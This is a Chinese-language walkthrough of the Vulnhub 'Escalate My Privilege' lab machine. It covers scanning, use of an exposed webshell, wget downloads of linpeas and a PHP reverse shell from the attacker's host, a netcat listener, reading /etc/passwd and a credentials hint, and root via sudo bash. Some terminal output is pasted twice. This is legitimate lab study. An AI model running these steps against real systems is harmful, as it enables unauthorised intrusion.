Vulnhub Escalate My Privilege靶机解题详细过程
Escalate My Privilege
识别目标主机IP地址
靶机地址:
https://www.vulnhub.com/entry/escalate-my-privileges-1,448/
─(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.64.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.160 08:00:27:7d:e8:51 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为192.168.56.160
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.160 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 20:49 EST
Nmap scan report for bogon (192.168.56.160)
Host is up (0.00035s latency).
Not shown: 65375 filtered tcp ports (no-response), 151 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
| 256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_ 256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 1 disallowed entry
|_/phpbash.php
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Check your Privilege
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 35320/udp6 nlockmgr
| 100021 1,3,4 40773/tcp nlockmgr
| 100021 1,3,4 46054/tcp6 nlockmgr
| 100021 1,3,4 47138/udp nlockmgr
| 100024 1 39117/tcp status
| 100024 1 39243/tcp6 status
| 100024 1 49169/udp status
| 100024 1 60805/udp6 status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
875/tcp closed unknown
2049/tcp open nfs_acl 3 (RPC #100227)
20048/tcp open mountd 1-3 (RPC #100005)
42955/tcp closed unknown
46666/tcp closed unknown
54302/tcp closed unknown
MAC Address: 08:00:27:7D:E8:51 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.40 seconds
虽然NMAP扫描结果显示有多个端口,但是有些端口是关闭状态,不予理会。值得分析和信息收集的端口主要是22(ssh),80(http),111(rpc),重点是http服务。
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ curl http://192.168.56.160
<!DOCTYPE html>
<html>
<head>
<title>Check your Privilege</title>
</head>
<body>
<a href="https://www.armourinfosec.com" target="_blank"><img src="privilege.png" width="100%" height="910" alt="http://ip/phpbash.php"></a>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ curl http://192.168.56.160/robots.txt
User-agent: *
Disallow: /phpbash.php
靶机作者提示很明显,在robots.txt文件中有/phpbash.php文件,访问该/phpbash.php文件,发现是webshell:
apache@my_privilege
:/var/www/html# ls
index.html
phpbash.php
phpinfo.php
privilege.png
readme.txt
robots.txt
apache@my_privilege
:/var/www/html# cat readme.txt
HI
Find Armour User backup in /backup
apache@my_privilege
:/var/www/html# cd /backup
apache@my_privilege
:/backup# ls -alh
total 8.0K
drwxrwxrwx 3 root root 19 Mar 21 2020 .
dr-xr-xr-x. 19 root root 4.0K Mar 19 2020 ..
drwxr-xr-x 2 armour armour 4.0K Nov 7 20:56 armour
apache@my_privilege
:/backup# cd armour
apache@my_privilege
:/backup/armour# ls -alh
total 60K
drwxr-xr-x 2 armour armour 4.0K Nov 7 20:56 .
drwxrwxrwx 3 root root 19 Mar 21 2020 ..
-rw-r--r-- 1 root root 246 Nov 7 20:56 1.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-06.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-08.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-09.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:47 2022-11-07-20-47.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:48 2022-11-07-20-48.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:49 2022-11-07-20-49.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:50 2022-11-07-20-50.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:51 2022-11-07-20-51.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:52 2022-11-07-20-52.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:53 2022-11-07-20-53.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:54 2022-11-07-20-54.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:55 2022-11-07-20-55.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:56 2022-11-07-20-56.tar.gz
apache@my_privilege
:/backup/armour# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
epmd:x:998:996:Erlang Port Mapper Daemon:/tmp:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
geoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
dockerroot:x:996:991:Docker User:/var/lib/docker:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
armour:x:1000:1000::/home/armour:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nginx:x:995:990:Nginx web server:/opt/rh/nginx16/root/var/lib/nginx:/sbin/nologin
mysql:x:994:989:MySQL server:/var/lib/mysql:/bin/bash
exim:x:31:31:Exim Daemon:/dev/null:/bin/false
apache@my_privilege
:/backup/armour# uname -a
Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
对目标主机采集一些基本的信息:
apache@my_privilege
:/var/www/html# ls
index.html
phpbash.php
phpinfo.php
privilege.png
readme.txt
robots.txt
apache@my_privilege
:/var/www/html# cat readme.txt
HI
Find Armour User backup in /backup
apache@my_privilege
:/var/www/html# cd /backup
apache@my_privilege
:/backup# ls -alh
total 8.0K
drwxrwxrwx 3 root root 19 Mar 21 2020 .
dr-xr-xr-x. 19 root root 4.0K Mar 19 2020 ..
drwxr-xr-x 2 armour armour 4.0K Nov 7 20:56 armour
apache@my_privilege
:/backup# cd armour
apache@my_privilege
:/backup/armour# ls -alh
total 60K
drwxr-xr-x 2 armour armour 4.0K Nov 7 20:56 .
drwxrwxrwx 3 root root 19 Mar 21 2020 ..
-rw-r--r-- 1 root root 246 Nov 7 20:56 1.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-06.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-08.tar.gz
-rw-r--r-- 1 root root 261 Mar 21 2020 2020-03-21-08-09.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:47 2022-11-07-20-47.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:48 2022-11-07-20-48.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:49 2022-11-07-20-49.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:50 2022-11-07-20-50.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:51 2022-11-07-20-51.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:52 2022-11-07-20-52.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:53 2022-11-07-20-53.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:54 2022-11-07-20-54.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:55 2022-11-07-20-55.tar.gz
-rw-r--r-- 1 root root 261 Nov 7 20:56 2022-11-07-20-56.tar.gz
apache@my_privilege
:/backup/armour# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
epmd:x:998:996:Erlang Port Mapper Daemon:/tmp:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
geoclue:x:997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
dockerroot:x:996:991:Docker User:/var/lib/docker:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
armour:x:1000:1000::/home/armour:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nginx:x:995:990:Nginx web server:/opt/rh/nginx16/root/var/lib/nginx:/sbin/nologin
mysql:x:994:989:MySQL server:/var/lib/mysql:/bin/bash
exim:x:31:31:Exim Daemon:/dev/null:/bin/false
apache@my_privilege
:/backup/armour# uname -a
Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
apache@my_privilege
:/backup/armour# which python
/usr/bin/python
apache@my_privilege
:/backup/armour# which nc
which: no nc in (/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin)
apache@my_privilege
:/backup/armour# cd /tmp
apache@my_privilege
:/tmp# wget http://192.168.56.137:8000/linpeas.sh
--2022-11-07 20:57:56-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
0K .......... .......... .......... .......... .......... 6% 98.6M 0s
50K .......... .......... .......... .......... .......... 12% 64.2M 0s
100K .......... .......... .......... .......... .......... 18% 472M 0s
150K .......... .......... .......... .......... .......... 24% 811M 0s
200K .......... .......... .......... .......... .......... 30% 115M 0s
250K .......... .......... .......... .......... .......... 37% 154M 0s
300K .......... .......... .......... .......... .......... 43% 785M 0s
350K .......... .......... .......... .......... .......... 49% 96.1M 0s
400K .......... .......... .......... .......... .......... 55% 710M 0s
450K .......... .......... .......... .......... .......... 61% 838M 0s
500K .......... .......... .......... .......... .......... 68% 795M 0s
550K .......... .......... .......... .......... .......... 74% 620M 0s
600K .......... .......... .......... .......... .......... 80% 746M 0s
650K .......... .......... .......... .......... .......... 86% 861M 0s
700K .......... .......... .......... .......... .......... 92% 865M 0s
750K .......... .......... .......... .......... .......... 98% 839M 0s
800K ........ 100% 687M=0.003s
2022-11-07 20:57:56 (243 MB/s) - 'linpeas.sh' saved [827827/827827]
apache@my_privilege
:/tmp# ls
linpeas.sh
apache@my_privilege
:/tmp# chmod +x linpeas.sh
chmod: changing permissions of 'linpeas.sh': Operation not permitted
apache@my_privilege
:/tmp# ls -alh
total 816K
drwxrwxrwt 2 root root 60 Nov 7 20:57 .
dr-xr-xr-x. 19 root root 4.0K Mar 19 2020 ..
-rw-r--r-- 1 root apache 809K Nov 7 20:57 linpeas.s
可以上传linpeas.sh脚本到目标主机,但是无法修改权限。
所以得另外想办法,虽然phpbash.php本身提供了一定的shell,但是这个shell功能受限,因此设法上传我们自己的PHP shell
apache@my_privilege
:/tmp# cd /var/www
apache@my_privilege
:/var/www# ls
cgi-bin
html
apache@my_privilege
:/var/www# cd html
apache@my_privilege
:/var/www/html# ls
index.html
phpbash.php
phpinfo.php
privilege.png
readme.txt
robots.txt
apache@my_privilege
:/var/www/html# which wget
/usr/bin/wget
apache@my_privilege
:/var/www/html# wget http://192.168.56.137:8000/shell.php
--2022-11-07 21:03:54-- http://192.168.56.137:8000/shell.php
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5496 (5.4K) [application/octet-stream]
Saving to: 'shell.php'
0K ..... 100% 677M=0s
2022-11-07 21:03:54 (677 MB/s) - 'shell.php' saved [5496/5496]
apache@my_privilege
:/var/www/html# ls
index.html
phpbash.php
phpinfo.php
privilege.png
readme.txt
robots.txt
shell.php
成功上传shell.php,然后在kali linux本地启用侦听,并用浏览器访问shell.php
提权
┌──(kali㉿kali)-[~/Vulnhub/Escalate_my_privilege]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.160] 35040
Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
21:05:17 up 19 min, 0 users, load average: 0.02, 0.16, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ which python
which python
/usr/bin/python
sh-4.2$ python -c 'import pty;pty.spawn("/binb/bash")'
python -c 'import pty;pty.spawn("/binb/bash")'
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/usr/lib64/python2.7/pty.py", line 165, in spawn
pid, master_fd = fork()
File "/usr/lib64/python2.7/pty.py", line 107, in fork
master_fd, slave_fd = openpty()
File "/usr/lib64/python2.7/pty.py", line 29, in openpty
master_fd, slave_name = _open_terminal()
File "/usr/lib64/python2.7/pty.py", line 70, in _open_terminal
raise os.error, 'out of pty devices'
OSError: out of pty devices
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/usr/lib64/python2.7/pty.py", line 165, in spawn
pid, master_fd = fork()
File "/usr/lib64/python2.7/pty.py", line 107, in fork
master_fd, slave_fd = openpty()
File "/usr/lib64/python2.7/pty.py", line 29, in openpty
master_fd, slave_name = _open_terminal()
File "/usr/lib64/python2.7/pty.py", line 70, in _open_terminal
raise os.error, 'out of pty devices'
OSError: out of pty devices
sh-4.2$ which python3
which python3
/usr/bin/python3
sh-4.2$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-4.2$ cd /tmp
cd /tmp
bash-4.2$ ls
ls
linpeas.sh tmux-48
bash-4.2$ ls -alh
ls -alh
total 816K
drwxrwxrwt 3 root root 80 Nov 7 20:59 .
dr-xr-xr-x. 19 root root 4.0K Mar 19 2020 ..
-rw-r--r-- 1 root apache 809K Nov 7 20:57 linpeas.sh
drwx------ 2 root apache 40 Nov 7 20:59 tmux-48
bash-4.2$ chmod +x linpeas.sh
chmod +x linpeas.sh
chmod: changing permissions of 'linpeas.sh': Operation not permitted
bash-4.2$
虽然Kali Linux可以获得反弹回来的shell,但是这个shell的功能是受限的,仍然不能执行修改权限的操作。紧接着浏览一下目录和文件,发现了有意思的文件,Credentials.txt
armour
bash-4.2$ cd armour
cd armour
bash-4.2$ ls -alh
ls -alh
total 24K
drwxrwxrwx 3 armour armour 121 Mar 21 2020 .
drwxr-xr-x. 3 root root 19 Apr 11 2018 ..
-rwxrwxrwx 1 armour armour 123 Mar 19 2020 .bash_history
-rwxrwxrwx 1 armour armour 27 Mar 17 2020 .bashrc
drwxrwxrwx 3 armour armour 18 Mar 17 2020 .local
-rwxrwxrwx 1 root armour 603 Mar 17 2020 .viminfo
-rw-r--r-- 1 armour armour 30 Mar 21 2020 Credentials.txt
-rwxrwxrwx 1 root root 17 Mar 17 2020 backup.sh
-rwxrwxrwx 1 root root 8 Mar 17 2020 runme.sh
bash-4.2$ cat Credentials.txt
cat Credentials.txt
my password is
md5(rootroot1)
bash-4.2$
这里作者提示armour用户的密码是对rootroot1进行md5加密
用在线网站工具得到加密后的值后登录
bash-4.2$ su - armour
su - armour
Password: b7bc8489abe360486b4b19dbc242e885
Last login: Sat Mar 21 07:51:51 EDT 2020
-bash-4.2$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
-bash-4.2$ sudo -l
sudo -l
Matching Defaults entries for armour on my_privilege:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", env_keep+=LD_PRELOAD,
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User armour may run the following commands on my_privilege:
(ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,
/bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish,
/bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc,
/usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh,
/usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano,
/usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk,
/usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red,
/usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp,
/usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd,
/usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail,
/usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,
/usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit,
/usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep,
/usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php,
/usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim,
/usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed,
/usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks,
/usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar,
/usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum, /usr/bin/expect,
/usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl,
/usr/bin/python, /usr/bin/man, /usr/bin/tclsh, /usr/bin/script,
/usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp,
/usr/bin/base64, /usr/bin/busybox, /usr/bin/cpan, /usr/bin/cpulimit,
/usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg,
/usr/sbin/dmsetup, /usr/bin/dnf, /usr/bin/docker,
/usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand,
/usr/bin/facter, /usr/bin/file, /usr/bin/finger, /usr/bin/flock,
/usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp,
/usr/bin/grep, /usr/bin/head, /usr/sbin/iftop, /usr/bin/ionice,
/usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl,
/usr/bin/jq, /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace,
/usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk,
/usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk,
/usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
/usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip,
/usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap,
/usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts,
/usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch,
/usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat,
/usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace,
/usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh,
/usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp,
/usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul,
/usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,
/usr/bin/xargs, /usr/bin/xxd, /script/test.sh, /script/test.py,
/sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht,
/bin/timedatectl, /home/armour/ai, /usr/bin/user_hello
-bash-4.2$ sudo bash
sudo bash
[root@my_privilege armour]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@my_privilege armour]# cd /root
cd /root
[root@my_privilege ~]# ls
ls
proof.txt
[root@my_privilege ~]# cat proof.txt
cat proof.txt
Best of Luck
628435356e49f976bab2c04948d22fe4
[root@my_privilege ~]#
sudo -l以后发现有太多可以提权的命令了,选择最简单的一种sudo bash
成功提权!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
